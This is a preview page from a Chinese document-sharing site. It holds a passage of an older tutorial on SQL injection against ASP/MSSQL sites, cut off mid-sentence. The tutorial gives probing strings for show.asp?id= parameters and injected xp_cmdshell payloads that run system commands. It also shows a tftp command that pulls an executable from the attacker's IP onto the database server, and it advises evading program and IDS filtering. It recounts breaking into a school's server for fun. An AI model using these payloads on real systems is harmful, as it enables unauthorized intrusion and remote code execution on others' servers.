返回
sql injection攻击技术入侵检测

sql injection攻击技术入侵检测

ID:6605708

大小:31.00 KB

页数:7页

时间:2018-01-20

sql injection攻击技术入侵检测_第1页
sql injection攻击技术入侵检测_第2页
sql injection攻击技术入侵检测_第3页
sql injection攻击技术入侵检测_第4页
sql injection攻击技术入侵检测_第5页
资源描述:

《sql injection攻击技术入侵检测》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库

1、SQLInjection攻击技术入侵检测SQLInjection攻击技术入侵检测  SQLinjection可以说是一种漏洞,也可以说成是一种攻击方法,程序中的变量处理不当,对用户提交的数据过滤不足,都可能产生这个漏洞,而攻击原理就是利用用户提交或可修改的数据,把想要的SQL语句插入到系统实际SQL语句中,轻则获得敏感的信息,重则控制服务器。SQLinjection并不紧紧局限在Mssql数据库中,Access、Mysql、Oracle、Sybase都可以进行SQLinjection攻击。  isno的《SQLinjection攻击技术》是一篇不可多得的好文

2、章,大家可以看看,但是程序毕竟是各种各样的,有些可以通过修改URL数据来提交命令或语句,有些则不行,不能打URL的主意,怎么办呢?通过修改标签内的value的值也可以提交我们构造的语句,SQLinjection是很灵活的技术,但我们的目的只有一个,就是想方设法饶过程序或IDS的检测和处理提交我们构造的有效语句。检测漏洞  在大多数ASP站点中,我们并不知道其程序代码,靠任何扫描器也不可能发现SQLinjection漏洞,这时就要靠手工检测了,由于我们执行SQL语句要用到单引号、分号、逗号、冒号和“--”,所以我们就在可修改的URL后加上以上符号

3、,或在表单中的文本框加上这些符号,比如:http://localhost/show.asp?id=1'http://localhost/show.asp?id=1;……  通过页面返回的信息,判断是否存在SQLinjection漏洞,只是最简单的通过字符过滤来判断,根据IIS配置不同,返回的信息是不定的,有时显示:MicrosoftOLEDBProviderforODBCDrivers错误'80040e21'ODBC驱动程序不支持所需的属性。/register/lostpass2.asp,行15  有时可能会显示“HTTP500-内部服务器错误”,也可能显示

4、原来的页面,也就是页面正常显示,更可能提示“HTTP404–找不到该页”,判断是否有漏洞就要有个最基本的根据——经验,原来我刚开始学习的时候认为我们学校没有这个漏洞,但小叮当告诉我,返回的信息仅仅是个根据,更重要的是经验,结果我们学校就在2小时内被他利用SQLinjection漏洞进入了,还开了一个telnet服务……  如果能拿到源代码就更好了,可以通过分析源代码来发现ASP文件的问题,不过这要求有较高的编程功底,最近PsKey就发现了不少程序存在SQLinjection漏洞。真是个厉害角色。提交数据  我们判断出一个ASP程序存在SQLinjection

5、漏洞以后就要构造我们的语句来对服务器进行操作了,一般我们的目的是控制SQL服务器查阅信息甚至操作系统。所以我们要用到xp_cmdshell这个扩展存储过程,xp_cmdshell是一个非常有用的扩展存储过程,用于执行系统命令,比如dir,我们可以根据程序的不同,提交不同的语句,下例语句仅仅是个参考,告诉大家这个原理,实际情况视程序而定,照搬不一定成功,下同。http://localhost/show.asp?id=1;execmaster.dbo.xp_cmdshell'dir';--http://localhost/show.asp?id=1';execm

6、aster..xp_cmdshell'dir'--  正如前面所说,提交这样的信息浏览器会返回出错信息或500错误,我们怎么才能知道执行是否成功呢?isno的办法是用nc监听本机端口,然后提交nslookup命令来查询,我个人觉得有些麻烦,直接用tftp来有多种好处,能知道命令是否成功执行;能获得SQL服务器的IP从而判断SQL服务器的位置;还能节省一些步骤直接上传文件到SQL服务器。利用xp_cmdshell扩展存储过程执行tftp命令,在玩unicode漏洞的时候大家就炉火纯青了吧?列如:http://localhost/show.asp?id=1;ex

7、ecmaster.dbo.xp_cmdshell'tftp–iyouipgetfile.exe';--http://localhost/show.asp?id=1';execmaster..xp_cmdshell'tftp–iyouipgetfile.exe'--  有时提交的数据并不一定起作用,看你怎么绕过程序的检测了,如果幸运成功的话,可以看到tftp软件的窗口出现从本机下载文件的信息了。  对话框中的IP地址就是SQL服务器的IP,可以根据这个IP判断SQL服务器处于什么位置,和web服务器一起,在局域网内,还是单独的服务器,就自己判断了,此知识点不在

8、本文讨论范围内,就此略过。命令执行成功以后,就可以替

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。